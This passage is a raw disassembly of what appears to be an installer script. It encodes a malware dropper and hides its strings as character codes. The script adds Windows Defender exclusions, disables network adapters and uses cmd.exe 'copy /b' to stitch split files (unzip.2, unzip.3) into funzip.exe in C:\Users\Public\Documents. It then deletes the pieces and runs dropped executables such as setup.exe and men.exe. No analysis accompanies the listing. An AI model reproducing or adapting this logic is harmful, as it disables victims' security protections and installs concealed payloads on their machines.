StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(21)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(102)    assign Var17[2], S32(117)    assign Var17[3], S32(110)    assign Var17[4], S32(122)    assign Var17[5], S32(105)    assign Var17[6], S32(112)    assign Var17[7], S32(46)    assign Var17[8], S32(101)    assign Var17[9], S32(120)    assign Var17[10], S32(101)    assign Var17[11], S32(34)    assign Var17[12], S32(32)    assign Var17[13], S32(38)    assign Var17[14], S32(38)    assign Var17[15], S32(32)    assign Var17[16], S32(100)    assign Var17[17], S32(101)    assign Var17[18], S32(108)    assign Var17[19], S32(32)    assign Var17[20], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(9)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype S32 ; StackCount = 17    assign Var17, S32(7)    pushvar Var16 ; StackCount = 18    call SETARRAYLENGTH    pop ; StackCount = 17    pop ; StackCount = 16    assign Var16[0], S32(99)    assign Var16[1], S32(109)    assign Var16[2], S32(100)    assign Var16[3], S32(46)    assign Var16[4], S32(101)    assign Var16[5], S32(120)    assign Var16[6], S32(101)    assign Var15, Var16    pop ; StackCount = 15    pushvar Var14 ; StackCount = 16    call STRFROMCODE    pop ; StackCount = 15    pop ; StackCount = 14    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    call ADDDEFENDEREXCLUSION    call OBFUSCATEDEXTRACT    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(51)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(120)    assign Var9[27], S32(56)    assign Var9[28], S32(54)    assign Var9[29], S32(45)    assign Var9[30], S32(77)    assign Var9[31], S32(105)    assign Var9[32], S32(99)    assign Var9[33], S32(114)    assign Var9[34], S32(111)    assign Var9[35], S32(115)    assign Var9[36], S32(111)    assign Var9[37], S32(102)    assign Var9[38], S32(116)    assign Var9[39], S32(45)    assign Var9[40], S32(87)    assign Var9[41], S32(105)    assign Var9[42], S32(110)    assign Var9[43], S32(100)    assign Var9[44], S32(111)    assign Var9[45], S32(119)    assign Var9[46], S32(115)    assign Var9[47], S32(100)    assign Var9[48], S32(97)    assign Var9[49], S32(116)    assign Var9[50], S32(97)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var2 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype Type30 ; StackCount = 8    pushtype Type30 ; StackCount = 9    pushtype S32 ; StackCount = 10    assign Var10, S32(36)    pushvar Var9 ; StackCount = 11    call SETARRAYLENGTH    pop ; StackCount = 10    pop ; StackCount = 9    assign Var9[0], S32(67)    assign Var9[1], S32(58)    assign Var9[2], S32(92)    assign Var9[3], S32(85)    assign Var9[4], S32(115)    assign Var9[5], S32(101)    assign Var9[6], S32(114)    assign Var9[7], S32(115)    assign Var9[8], S32(92)    assign Var9[9], S32(80)    assign Var9[10], S32(117)    assign Var9[11], S32(98)    assign Var9[12], S32(108)    assign Var9[13], S32(105)    assign Var9[14], S32(99)    assign Var9[15], S32(92)    assign Var9[16], S32(68)    assign Var9[17], S32(111)    assign Var9[18], S32(99)    assign Var9[19], S32(117)    assign Var9[20], S32(109)    assign Var9[21], S32(101)    assign Var9[22], S32(110)    assign Var9[23], S32(116)    assign Var9[24], S32(115)    assign Var9[25], S32(92)    assign Var9[26], S32(83)    assign Var9[27], S32(101)    assign Var9[28], S32(114)    assign Var9[29], S32(118)    assign Var9[30], S32(101)    assign Var9[31], S32(114)    assign Var9[32], S32(46)    assign Var9[33], S32(108)    assign Var9[34], S32(111)    assign Var9[35], S32(103)    assign Var8, Var9    pop ; StackCount = 8    pushvar Var3 ; StackCount = 9    call STRFROMCODE    pop ; StackCount = 8    pop ; StackCount = 7    pushtype WideString ; StackCount = 8    assign Var8, Var2    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(11)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(83)    assign Var11[2], S32(101)    assign Var11[3], S32(114)    assign Var11[4], S32(118)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(46)    assign Var11[8], S32(108)    assign Var11[9], S32(111)    assign Var11[10], S32(103)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var4, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var2    pushvar Var8 ; StackCount = 10    call FORCEDIRECTORIES    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var3    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_1d7a    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_1d46    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushvar Var8 ; StackCount = 10    call DELETEFILE    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_1d46:    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var4    pushtype UnicodeString_2 ; StackCount = 10    assign Var10, Var3    pushvar Var8 ; StackCount = 11    call RENAMEFILE    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_1d7a:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(26)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var11[25], S32(92)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(9)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(115)    assign Var11[1], S32(101)    assign Var11[2], S32(116)    assign Var11[3], S32(117)    assign Var11[4], S32(112)    assign Var11[5], S32(46)    assign Var11[6], S32(101)    assign Var11[7], S32(120)    assign Var11[8], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var6, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var6    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_21ed    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(5)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var6    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_21ed:    pushtype WideString ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(25)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(67)    assign Var11[1], S32(58)    assign Var11[2], S32(92)    assign Var11[3], S32(85)    assign Var11[4], S32(115)    assign Var11[5], S32(101)    assign Var11[6], S32(114)    assign Var11[7], S32(115)    assign Var11[8], S32(92)    assign Var11[9], S32(80)    assign Var11[10], S32(117)    assign Var11[11], S32(98)    assign Var11[12], S32(108)    assign Var11[13], S32(105)    assign Var11[14], S32(99)    assign Var11[15], S32(92)    assign Var11[16], S32(68)    assign Var11[17], S32(111)    assign Var11[18], S32(99)    assign Var11[19], S32(117)    assign Var11[20], S32(109)    assign Var11[21], S32(101)    assign Var11[22], S32(110)    assign Var11[23], S32(116)    assign Var11[24], S32(115)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    assign Var8, Var9    pop ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    pushtype Type30 ; StackCount = 10    pushtype Type30 ; StackCount = 11    pushtype S32 ; StackCount = 12    assign Var12, S32(8)    pushvar Var11 ; StackCount = 13    call SETARRAYLENGTH    pop ; StackCount = 12    pop ; StackCount = 11    assign Var11[0], S32(92)    assign Var11[1], S32(109)    assign Var11[2], S32(101)    assign Var11[3], S32(110)    assign Var11[4], S32(46)    assign Var11[5], S32(101)    assign Var11[6], S32(120)    assign Var11[7], S32(101)    assign Var10, Var11    pop ; StackCount = 10    pushvar Var9 ; StackCount = 11    call STRFROMCODE    pop ; StackCount = 10    pop ; StackCount = 9    add Var8, Var9    pop ; StackCount = 8    assign Var5, Var8    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushtype UnicodeString_2 ; StackCount = 9    assign Var9, Var5    pushvar Var8 ; StackCount = 10    call FILEEXISTS    pop ; StackCount = 9    pop ; StackCount = 8    sfz Var8    pop ; StackCount = 7    jf loc_263a    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(0)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    pushtype Type30 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype S32 ; StackCount = 15    assign Var15, S32(0)    pushvar Var14 ; StackCount = 16    call SETARRAYLENGTH    pop ; StackCount = 15    pop ; StackCount = 14    assign Var13, Var14    pop ; StackCount = 13    pushvar Var12 ; StackCount = 14    call STRFROMCODE    pop ; StackCount = 13    pop ; StackCount = 12    pushtype UnicodeString_2 ; StackCount = 13    pushtype Type30 ; StackCount = 14    pushtype Type30 ; StackCount = 15    pushtype S32 ; StackCount = 16    assign Var16, S32(0)    pushvar Var15 ; StackCount = 17    call SETARRAYLENGTH    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushvar Var13 ; StackCount = 15    call STRFROMCODE    pop ; StackCount = 14    pop ; StackCount = 13    pushtype UnicodeString_2 ; StackCount = 14    assign Var14, Var5    pushvar Var8 ; StackCount = 15    call EXEC    pop ; StackCount = 14    pop ; StackCount = 13    pop ; StackCount = 12    pop ; StackCount = 11    pop ; StackCount = 10    pop ; StackCount = 9    pop ; StackCount = 8    pop ; StackCount = 7loc_263a:    jump loc_4c1aloc_263f:    call ADDDEFENDEREXCLUSION    call DISABLENETWORKADAPTERS    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(1)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    assign Var12, String_3("")    pushtype UnicodeString_2 ; StackCount = 13    pushtype WideString ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(12)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(47)    assign Var17[1], S32(99)    assign Var17[2], S32(32)    assign Var17[3], S32(99)    assign Var17[4], S32(111)    assign Var17[5], S32(112)    assign Var17[6], S32(121)    assign Var17[7], S32(32)    assign Var17[8], S32(47)    assign Var17[9], S32(98)    assign Var17[10], S32(32)    assign Var17[11], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(13)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(43)    assign Var17[11], S32(32)    assign Var17[12], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(50)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(21)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(102)    assign Var17[2], S32(117)    assign Var17[3], S32(110)    assign Var17[4], S32(122)    assign Var17[5], S32(105)    assign Var17[6], S32(112)    assign Var17[7], S32(46)    assign Var17[8], S32(101)    assign Var17[9], S32(120)    assign Var17[10], S32(101)    assign Var17[11], S32(34)    assign Var17[12], S32(32)    assign Var17[13], S32(38)    assign Var17[14], S32(38)    assign Var17[15], S32(32)    assign Var17[16], S32(100)    assign Var17[17], S32(101)    assign Var17[18], S32(108)    assign Var17[19], S32(32)    assign Var17[20], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], S32(68)    assign Var17[17], S32(111)    assign Var17[18], S32(99)    assign Var17[19], S32(117)    assign Var17[20], S32(109)    assign Var17[21], S32(101)    assign Var17[22], S32(110)    assign Var17[23], S32(116)    assign Var17[24], S32(115)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(11)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(92)    assign Var17[1], S32(117)    assign Var17[2], S32(110)    assign Var17[3], S32(122)    assign Var17[4], S32(105)    assign Var17[5], S32(112)    assign Var17[6], S32(46)    assign Var17[7], S32(51)    assign Var17[8], S32(34)    assign Var17[9], S32(32)    assign Var17[10], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    add Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(25)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(67)    assign Var17[1], S32(58)    assign Var17[2], S32(92)    assign Var17[3], S32(85)    assign Var17[4], S32(115)    assign Var17[5], S32(101)    assign Var17[6], S32(114)    assign Var17[7], S32(115)    assign Var17[8], S32(92)    assign Var17[9], S32(80)    assign Var17[10], S32(117)    assign Var17[11], S32(98)    assign Var17[12], S32(108)    assign Var17[13], S32(105)    assign Var17[14], S32(99)    assign Var17[15], S32(92)    assign Var17[16], 